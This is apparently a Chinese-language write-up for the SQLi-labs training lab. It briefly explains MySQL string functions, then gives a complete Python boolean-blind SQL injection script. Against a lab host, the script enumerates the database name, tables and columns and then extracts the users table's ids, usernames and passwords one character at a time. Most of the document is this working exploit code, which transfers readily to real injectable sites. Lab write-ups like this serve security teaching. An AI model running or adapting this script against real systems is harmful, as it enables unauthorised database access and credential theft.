SQLI-LABS LESS5
Mysql重要函数介绍
ascii(char):
- char:返回返回对应的ascii码的字符
substr(str,position,length):
- str:主字符串
- position:指定从第几个字符串开始
- length:需要获取的长度
length(str):返回str的字符串长度
database():查看当前使用的数据库库名
count():返回查询语句的结果数量
重要关键词
limit m,n:返回查询结果的m~m+n项
- m:从第几条开始,第一条位0
- n:指定长度
脚本代码
import requests
url = 'http://192.168.115.130/sqli-labs-master/Less-8/?id='
# 爆数据库长度
db_length = 0
for i in range(1, 20):
db_payload = "1' and (length(database())=%d) --+" % i
r = requests.get(url+db_payload)
if "You are in" in r.text:
print("数据库长度为:", i)
db_length = i
break
# 爆数据库名称
db_name = ''
for i in range(1, db_length+1):
for j in range(95, 123):
db_payload = "1' and (left(database(),%d)='%s') --+" % (i, db_name+chr(j))
r = requests.get(url+db_payload)
if "You are in" in r.text:
db_name = db_name+chr(j)
print("数据库名称为:", db_name)
# 爆表数量
table_num = 0
for i in range(100):
db_payload = "1' and (select count(table_name) from information_schema.tables where table_schema='%s')=%d --+" %(db_name, i)
r = requests.get(url+db_payload)
if "You are in" in r.text:
table_num = i
break
print("数据库当前有%d张表" % table_num)
# 爆表名称
tables_name = []
for i in range(table_num):
k = 1
flag = 0
table_name = ''
while flag == 0:
for j in range(95, 123):
db_payload = "1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d --+" % (i, k, j)
r = requests.get(url+db_payload)
if "You are in" in r.text:
k = k+1
table_name = table_name+chr(j)
break
elif j == 122:
flag = 1
tables_name.append(table_name)
break
# print("当前扫描出的表:", end='')
# print(','.join(tables_name))
# while True:
# print("请输入要扫描的表:", end='')
# table = input()
# if table in tables_name:
# break
# print("//// 输入错误,请重新输入 ////")
table_name = 'users'
column_num = 0
# 爆字段数量
for i in range(100):
db_payload = ("1' and "
"(select count(column_name) from information_schema.columns where table_schema=database() and table_name='%s')"
"=%d --+") % (table_name, i)
r = requests.get(url+db_payload)
if 'You are in' in r.text:
column_num = i
break
print("该表共有", column_num, "个字段:", end='')
# 爆字段名称
columns_name = []
for i in range(column_num):
column_name = ''
k = 1
flag = 0
while flag == 0:
for j in range(95, 123):
db_payload = """1' and
ascii(substr((select column_name from information_schema.columns
where table_schema=database() and table_name='%s'
limit %d,1 )
,%d,1))=%d --+""" % (table_name, i, k, j)
r = requests.get(url+db_payload)
if "You are in" in r.text:
k = k+1
column_name = column_name+chr(j)
break
elif j == 122:
flag = 1
columns_name.append(column_name)
break
print(','.join(columns_name))
columns_name = ['id', 'username', 'password']
columns_num = 3
data_num = 0
# 爆数据数量
for i in range(20):
db_payload = "1' and (select count(%s) from %s)=%d --+" % (columns_name[0], table_name, i)
r = requests.get(url+db_payload)
if "You are in" in r.text:
data_num = i
print("该表共有", data_num, "个数据")
break
user_id = []
user_name = []
user_pw = []
# 爆数据结果
for i in range(data_num):
# id
for k in range(20):
db_payload = "1' and (select %s from %s limit %d,1)=%d --+" % (columns_name[0], table_name, i, k)
r = requests.get(url+db_payload)
if "You are in" in r.text:
user_id.append(k)
print("%2d" % k, end=' ')
break
# username
un = ''
flag = 0
j = 1
while flag == 0:
for k in range(48, 123):
if k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):
continue
db_payload = "1' and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (columns_name[1], table_name, i, j, k)
r = requests.get(url+db_payload)
if "You are in" in r.text:
un += chr(k)
j += 1
break
if k == 122:
flag = 1
user_name.append(un)
print("%10s" % un, end=' ')
break
# password
pw = ''
flag = 0
j = 1
while flag == 0:
for k in range(33, 123):
if k not in (33, 45, 64) and k not in range(48, 58) and k not in range(65, 91) and k not in range(95, 123):
continue
db_payload = "1' and ascii(substr((select %s from %s limit %d,1),%d,1))=%d --+" % (columns_name[2], table_name, i, j, k)
r = requests.get(url + db_payload)
if "You are in" in r.text:
pw += chr(k)
j += 1
break
if k == 122:
flag = 1
user_pw.append(pw)
print(" ", pw)
break
部分运行结果:
